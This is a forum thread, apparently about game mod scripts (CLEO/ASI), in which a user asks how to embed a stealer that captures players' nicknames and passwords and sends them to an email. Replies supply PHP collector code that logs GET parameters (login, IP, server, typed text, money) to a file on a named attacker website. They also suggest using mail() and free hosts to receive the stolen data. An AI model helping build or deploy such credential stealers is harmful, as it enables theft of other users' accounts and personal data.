Hi,can a small script be inserted into the script that takes pw and nick from the people who use that script and send it to email or alread?
there used to be examples of stealers on cheatru or something like that
what?
Anf where send all data?,
<?php
$f = fopen("Readme.HTML", "a");
$s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />";
fwrite($f, $s);
fclose($f);
?>
to the website set up by the attacker:
http://rvankarus.esy.es/cleo/add.php
which opens "Readme.HTML" and appends new line with collected data using PHP, that's the code responsible for that (which he included in the comments of that cleo):
btw that "Readme.HTML" was accessible for anyone who knew the link by looking in the code, so anyone could see the collected data, that's probably not the way you'd want to set it up
too complicated for me and my knowledge if you can put those scripts together and just change the email on them and that's if you can and if it doesn't matter I'll look furtherhttps://www.w3schools.com/php/func_mail_mail.asp
if you host your website on 000webhost using free account, then there's 50 emails per day limit
You need stealer cleo or asi and website.
sprinthost.ru and 000webhost is okay.
i have a better idea, let's post here passwords of players whos got cheated and tricked into using stealer